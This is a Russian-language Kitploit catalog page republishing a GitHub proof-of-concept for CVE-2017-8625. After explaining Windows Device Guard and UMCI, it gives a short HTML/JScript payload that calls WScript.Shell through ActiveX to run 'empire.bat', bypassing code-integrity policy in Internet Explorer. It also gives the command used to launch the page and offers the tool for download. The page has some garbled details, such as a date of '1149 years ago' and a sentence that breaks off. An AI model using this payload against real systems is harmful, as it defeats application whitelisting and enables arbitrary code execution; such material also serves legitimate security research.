Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-8625_Bypass_UMCI — Эксплойт proof-of-concept, демонстрирующий обход UMCI в Internet Explorer с использованием JScript и ActiveX для выполнения произвольных бинарных файлов, нацеленный на политики целостности кода Windows Device Guard. | Kitploit
Инструменты/GitHubGitHub/homjxi0e/cve-2017-8625_bypass_umci
Повышение привилегийАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubhomjxi0e/cve-2017-8625_bypass_umci

CVE-2017-8625_Bypass_UMCI

Эксплойт proof-of-concept, демонстрирующий обход UMCI в Internet Explorer с использованием JScript и ActiveX для выполнения произвольных бинарных файлов, нацеленный на политики целостности кода Windows Device Guard.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1149 лет назадЕщё не проверено

что такое ! Windows Defender Device Guard !


Windows Defender Device Guard — это комбинация корпоративных аппаратных и программных функций безопасности, которые при совместной настройке блокируют устройство, позволяя запускать только доверенные приложения, определённые в политиках целостности кода. Если приложение не является доверенным, оно не сможет работать, точка. При наличии оборудования, отвечающего базовым требованиям, это также означает, что даже если злоумышленнику удастся получить контроль над ядром Windows, он с гораздо меньшей вероятностью сможет запустить вредоносный исполняемый код. При соответствующем оборудовании Windows Defender Device Guard может использовать новую безопасность на основе виртуализации в Windows 10 (доступна в редакциях Enterprise и Education для настольных SKU, а также во всех серверных SKU) для изоляции службы целостности кода от самого ядра Microsoft Windows. В этом случае служба целостности кода работает вместе с ядром в защищённом гипервизором контейнере Windows. В этом руководстве рассматриваются отдельные функции Windows Defender Device Guard, а также вопросы планирования, настройки и развёртывания. Оно включает:

что такое UMCI

UMCI предотвращает выполнение неутверждённых двоичных файлов, ограничивает Windows Scripting Host и переводит PowerShell в режим ограниченного языка. Это делает получение кода для выполнения в системе довольно сложной задачей. Этот пост будет

======================================================================||>

обход UMCI в Enternet Explorer с помощью JScript !

Давайте посмотрим на обход кода

======================================================================||>

root@kitploit:~
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>

======================================================================||>

root@kitploit:~
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"

Изменение кода JScript !

скриншот от 2017-08-25 11-55-12 ======================================================================||>

Далее запуск обхода

скриншот от 2017-08-25 11-56-01

======================================================================||> ======================================================================||>

Пояснение автора

@Matt Homjxi0e

Автор обхода

@enigma0x3

Скачать инструмент